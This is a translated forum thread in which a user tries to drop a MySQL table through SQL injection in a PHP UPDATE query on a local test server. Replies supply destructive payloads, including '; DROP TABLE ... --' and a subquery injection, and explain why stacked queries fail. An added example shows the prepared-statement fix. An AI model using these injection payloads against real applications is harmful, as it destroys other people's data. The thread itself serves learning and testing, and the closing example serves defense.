I am trying to drop the table on my Denver through SQL injection:

<form method="post" action="http://test1.ru/?menu=admin&sel=rules"> <input type="text" name="tx" value="'; DROP TABLE db_conabrul;"> <input type="submit" value="next"> </form> 

No matter what I tried, I cannot drop the table. I am testing on Denver, and the delete privilege is there. It displays just this error:

 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE db_conabrul;' WHERE id = '1'' at line 1 

The table is not dropped. Through a direct query in pma everything is ok. But it has to be through an injection. What am I doing wrong?

The request looks like this:

 $db->Query("UPDATE db_conabrul SET rules = '".$_POST["tx"]."' WHERE id = '1'"); 
  • If this is really your local Denver - log somewhere the SQL query glued together with your injection and see what is wrong with the syntax. - Nofate
  • 2
    After the injection you need at least to comment out everything that follows ('; DROP TABLE db_conabrul; -- ) so that the query does not fall apart. The location is not very standard for substituting anything at all. - etki
  • @Fike, your variant '; DROP TABLE db_conabrul; -- did not work. How should it be done at all? Please tell me. - ModaL
  • @Modal, give your SQL code. If you just need a classic example, then SELECT * FROM users WHERE login = ':placeholder'; I need your result, filthy machine '; DROP TABLE users; -- should work. - etki
  • @Fike, do not plow. Look at the query here: >> $db->Query("UPDATE db_conabrul SET rules = '".$_POST["tx"]."' WHERE id = '1'"); - ModaL

2 answers

 "UPDATE db_conabrul SET rules = '".$_POST["tx"]."' WHERE id = '1'"
 $_POST["tx"] = ',id=(select IF((DROP TABLE db_conabrul)=1,1,1))),id='1

the output is:

 UPDATE db_conabrul SET rules = '',id=(select IF((DROP TABLE db_conabrul)=1,1,1))), id='1' WHERE id = '1'; 

a valid SQL query with a subquery ... I have not tested its validity, but where to dig .. I think it will be clear ....

If even after such an example it is not clear to you, then I advise you to read the literature first, on MySQL for example ... and the fact that it does not work with copy-paste is most likely the case ... I just indicated the direction)

  1. Above it has already been pointed out to you that it is impossible to perform 2 queries in 1 line!
  2. Based on what is written above, you need to substitute valid data for the query rules = '' i.e. start the injection with VALID data for this query
  3. then "close" the quote
  4. then wedge in and insert an INJECTION query so that it is a subquery that returns something in real conditions, for example, as in my example (I don't know what you can put in id) my injection will write (do) SET id = 1, the digit 1 turns out to be a subquery with an injection (select IF((DROP TABLE db_conabrul),1,1)), this is how the idea works) where 1,1 is written - that is what the subquery returns ...
  5. I think in your case MySQL will not allow DROPping the table on which the UPDATE is being performed. The table is locked (although I am not sure), try dropping another table.
  6. Think ... :)
  • @ToRcH565, invalid. I do not know which way to dig, so I ask here .. - ModaL
  • Corrected the answer. - Vladimir Klykov

And what is "under the hood" of $db->Query()? If it is something like mysql_query() - then executing several queries at once does not work:

It sends a unique query (that is, multiple queries are not supported).

http://php.net/manual/en/function.mysql-query.php

  • 8
    @ModaL where does so much anger come from? - IVsevolod
  • @IVsevolod, because the answers are off topic. I want to learn >< Maybe you know how to just drop a table through an injection into $db->Query("UPDATE db_conabrul SET rules = '".$_POST["tx"]."' WHERE id = '1'"); ? :D - ModaL
  • 3
    @ModaL it may well be on topic, because if the function is not able to execute 2 queries from the input string, then dropping the table will fail just the same, because this will be the second query. In general, you have already been advised. > try to execute the query that is obtained by gluing, to identify errors and move in the right direction) - IVsevolod
  • @IVsevolod, how should I understand "when gluing"? Not catching on :( - ModaL
  • 2
    @ModaL, you have a parameterized query $db->Query("UPDATE db_conabrul SET rules = '".$_POST["tx"]."' WHERE id = '1'"); The script substitutes your fragment from tx into it. As a result, the query that goes to the database is glued (concatenated, interpolated) from several strings. I.e. try changing the code a bit: $my_query = "UPDATE db_conabrul SET rules = '".$_POST["tx"]."' WHERE id = '1'"; $db->Query($my_query); and see what ultimately is in $my_query (via echo, var_dump, whatever). Well, show us. - Nofate
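An added example (not code from the question or the answers) that puts the glued query from the question beside a mysqli prepared-statement version of the same UPDATE; the $mysqli connection and the function names are assumptions. mysql_query() rejecting a second statement is not a defense, since the first answer shows the injected text can still rewrite the UPDATE itself; only binding the value keeps it out of the SQL.

```php
<?php
// Added example; not the code from the question or the answers. Assumes a
// MySQL table db_conabrul(id, rules) as in the question and an already open
// mysqli connection in $mysqli (hypothetical names throughout).

// Vulnerable form: the request value is glued into the SQL text, exactly as
// $db->Query(...) does in the question. Returning the string lets you echo
// it, which is the debugging step Nofate suggests in the comments.
function buildVulnerableQuery(string $tx): string
{
    return "UPDATE db_conabrul SET rules = '" . $tx . "' WHERE id = '1'";
}

// Hardened form: the value is bound as a parameter, so quotes, commas and
// semicolons in $tx are stored literally and never become part of the SQL.
function updateRulesSafely(mysqli $mysqli, string $tx): bool
{
    $stmt = $mysqli->prepare("UPDATE db_conabrul SET rules = ? WHERE id = '1'");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $mysqli->error);
    }
    $stmt->bind_param('s', $tx);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Show what actually reaches MySQL in the vulnerable form for the fragment
// from the question (constructed input, no database connection needed).
echo buildVulnerableQuery("'; DROP TABLE db_conabrul;"), PHP_EOL;
```

With the prepared statement the same fragment is written into the rules column as plain text and the single UPDATE runs unchanged.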